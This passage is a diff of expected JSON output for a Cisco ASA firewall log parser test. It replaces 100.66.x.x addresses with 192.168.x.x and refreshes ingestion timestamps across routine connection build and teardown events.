"localhost" ], "ip": [ - "100.66.205.104", + "192.168.205.104", "172.31.98.44" ] }, @@ -138,8 +138,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721218700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", + "ingested": "2021-12-09T13:34:28.099043200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -155,7 +155,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.104", + "mapped_source_ip": "192.168.205.104", "connection_id": "11757", "source_interface": "outside", "mapped_destination_port": 1772 @@ -177,8 +177,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -213,7 +213,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -224,8 +224,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721225600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099049400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -262,8 +262,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -298,7 +298,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -309,8 +309,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721231Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099055100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -347,8 +347,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" @@ -383,7 +383,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -394,8 +394,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721235900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099060900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -432,8 +432,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" @@ -468,7 +468,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -479,8 +479,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721240200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099066600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -517,8 +517,8 @@ }, "source": { "port": 80, - "address": "100.66.160.197", - "ip": "100.66.160.197" + "address": "192.168.160.197", + "ip": "192.168.160.197" }, "tags": [ "preserve_original_event" @@ -553,7 +553,7 @@ "localhost" ], "ip": [ - "100.66.160.197", + "192.168.160.197", "172.31.98.44" ] }, @@ -564,8 +564,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721244600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099072300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -602,8 +602,8 @@ }, "source": { "port": 80, - "address": "100.66.205.14", - "ip": "100.66.205.14" + "address": "192.168.205.14", + "ip": "192.168.205.14" }, "tags": [ "preserve_original_event" @@ -638,7 +638,7 @@ "localhost" ], "ip": [ - "100.66.205.14", + "192.168.205.14", "172.31.98.44" ] }, @@ -649,8 +649,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721249200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099078Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -687,8 +687,8 @@ }, "source": { "port": 80, - "address": "100.66.124.33", - "ip": "100.66.124.33" + "address": "192.168.124.33", + "ip": "192.168.124.33" }, "tags": [ "preserve_original_event" @@ -723,7 +723,7 @@ "localhost" ], "ip": [ - "100.66.124.33", + "192.168.124.33", "172.31.98.44" ] }, @@ -734,8 +734,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721254500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099083800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -772,8 +772,8 @@ }, "source": { "port": 80, - "address": "100.66.35.9", - "ip": "100.66.35.9" + "address": "192.168.35.9", + "ip": "192.168.35.9" }, "tags": [ "preserve_original_event" @@ -808,7 +808,7 @@ "localhost" ], "ip": [ - "100.66.35.9", + "192.168.35.9", "172.31.98.44" ] }, @@ -819,8 +819,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721259Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099089600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -857,8 +857,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -893,7 +893,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -904,8 +904,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721265Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099095400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -942,8 +942,8 @@ }, "source": { "port": 80, - "address": "100.66.218.21", - "ip": "100.66.218.21" + "address": "192.168.218.21", + "ip": "192.168.218.21" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ "localhost" ], "ip": [ - "100.66.218.21", + "192.168.218.21", "172.31.98.44" ] }, @@ -989,8 +989,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721270300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099101600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1027,8 +1027,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" @@ -1063,7 +1063,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1074,8 +1074,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721275100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099107400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1112,8 +1112,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" @@ -1148,7 +1148,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1159,8 +1159,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721279800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099112400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1197,8 +1197,8 @@ }, "source": { "port": 80, - "address": "100.66.202.211", - "ip": "100.66.202.211" + "address": "192.168.202.211", + "ip": "192.168.202.211" }, "tags": [ "preserve_original_event" @@ -1233,7 +1233,7 @@ "localhost" ], "ip": [ - "100.66.202.211", + "192.168.202.211", "172.31.98.44" ] }, @@ -1244,8 +1244,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721284900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099115900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1282,8 +1282,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" @@ -1318,7 +1318,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1329,8 +1329,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721289900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099120400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -1367,8 +1367,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" @@ -1403,7 +1403,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1414,8 +1414,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721295Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099125600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1452,8 +1452,8 @@ }, "source": { "port": 80, - "address": "100.66.209.247", - "ip": "100.66.209.247" + "address": "192.168.209.247", + "ip": "192.168.209.247" }, "tags": [ "preserve_original_event" @@ -1488,7 +1488,7 @@ "localhost" ], "ip": [ - "100.66.209.247", + "192.168.209.247", "172.31.98.44" ] }, @@ -1499,8 +1499,8 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721301Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099130700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:45.000Z", @@ -1537,8 +1537,8 @@ }, "source": { "port": 80, - "address": "100.66.35.162", - "ip": "100.66.35.162" + "address": "192.168.35.162", + "ip": "192.168.35.162" }, "tags": [ "preserve_original_event" @@ -1573,7 +1573,7 @@ "localhost" ], "ip": [ - "100.66.35.162", + "192.168.35.162", "172.31.98.44" ] }, @@ -1584,8 +1584,8 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-09-07T12:21:32.721305600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", + "ingested": "2021-12-09T13:34:28.099136500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:26.000Z", @@ -1617,8 +1617,8 @@ }, "destination": { "port": 1188, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -1658,7 +1658,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -1666,8 +1666,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721310300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188", + "ingested": "2021-12-09T13:34:28.099140700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1700,8 +1700,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1736,7 +1736,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, @@ -1745,8 +1745,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721314900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099145100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1762,7 +1762,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.80.32", + "mapped_source_ip": "192.168.80.32", "connection_id": "11758", "source_interface": "outside", "mapped_destination_port": 56132 @@ -1784,8 +1784,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1820,7 +1820,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, @@ -1830,8 +1830,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721319300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", + "ingested": "2021-12-09T13:34:28.099148600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -1868,8 +1868,8 @@ }, "source": { "port": 53, - "address": "100.66.252.6", - "ip": "100.66.252.6" + "address": "192.168.252.6", + "ip": "192.168.252.6" }, "tags": [ "preserve_original_event" @@ -1904,7 +1904,7 @@ "localhost" ], "ip": [ - "100.66.252.6", + "192.168.252.6", "172.31.98.44" ] }, @@ -1913,8 +1913,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721323900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099153Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1930,7 +1930,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.6", + "mapped_source_ip": "192.168.252.6", "connection_id": "11759", "source_interface": "outside", "mapped_destination_port": 56132 @@ -1952,8 +1952,8 @@ }, "source": { "port": 53, - "address": "100.66.252.6", - "ip": "100.66.252.6" + "address": "192.168.252.6", + "ip": "192.168.252.6" }, "tags": [ "preserve_original_event" @@ -1988,7 +1988,7 @@ "localhost" ], "ip": [ - "100.66.252.6", + "192.168.252.6", "172.31.98.44" ] }, @@ -1998,8 +1998,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721329Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", + "ingested": "2021-12-09T13:34:28.099158900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2031,8 +2031,8 @@ }, "destination": { "port": 8257, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1773, @@ -2072,7 +2072,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2080,8 +2080,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721333600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257", + "ingested": "2021-12-09T13:34:28.099164300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2114,8 +2114,8 @@ }, "source": { "port": 80, - "address": "100.66.252.226", - "ip": "100.66.252.226" + "address": "192.168.252.226", + "ip": "192.168.252.226" }, "tags": [ "preserve_original_event" @@ -2150,7 +2150,7 @@ "localhost" ], "ip": [ - "100.66.252.226", + "192.168.252.226", "172.31.98.44" ] }, @@ -2159,8 +2159,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721338900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", + "ingested": "2021-12-09T13:34:28.099170100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2176,7 +2176,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.226", + "mapped_source_ip": "192.168.252.226", "connection_id": "11760", "source_interface": "outside", "mapped_destination_port": 1773 @@ -2193,8 +2193,8 @@ }, "destination": { "port": 8258, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1774, @@ -2234,7 +2234,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2242,8 +2242,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721344200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258", + "ingested": "2021-12-09T13:34:28.099175900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2276,8 +2276,8 @@ }, "source": { "port": 80, - "address": "100.66.252.226", - "ip": "100.66.252.226" + "address": "192.168.252.226", + "ip": "192.168.252.226" }, "tags": [ "preserve_original_event" @@ -2312,7 +2312,7 @@ "localhost" ], "ip": [ - "100.66.252.226", + "192.168.252.226", "172.31.98.44" ] }, @@ -2321,8 +2321,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721348500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", + "ingested": "2021-12-09T13:34:28.099181700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2338,7 +2338,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.226", + "mapped_source_ip": "192.168.252.226", "connection_id": "11761", "source_interface": "outside", "mapped_destination_port": 1774 @@ -2360,8 +2360,8 @@ }, "source": { "port": 53, - "address": "100.66.238.126", - "ip": "100.66.238.126" + "address": "192.168.238.126", + "ip": "192.168.238.126" }, "tags": [ "preserve_original_event" @@ -2396,7 +2396,7 @@ "localhost" ], "ip": [ - "100.66.238.126", + "192.168.238.126", "172.31.98.44" ] }, @@ -2405,8 +2405,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721354500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099187500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2422,7 +2422,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.238.126", + "mapped_source_ip": "192.168.238.126", "connection_id": "11762", "source_interface": "outside", "mapped_destination_port": 56132 @@ -2444,8 +2444,8 @@ }, "source": { "port": 53, - "address": "100.66.93.51", - "ip": "100.66.93.51" + "address": "192.168.93.51", + "ip": "192.168.93.51" }, "tags": [ "preserve_original_event" @@ -2480,7 +2480,7 @@ "localhost" ], "ip": [ - "100.66.93.51", + "192.168.93.51", "172.31.98.44" ] }, @@ -2489,8 +2489,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721359200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for 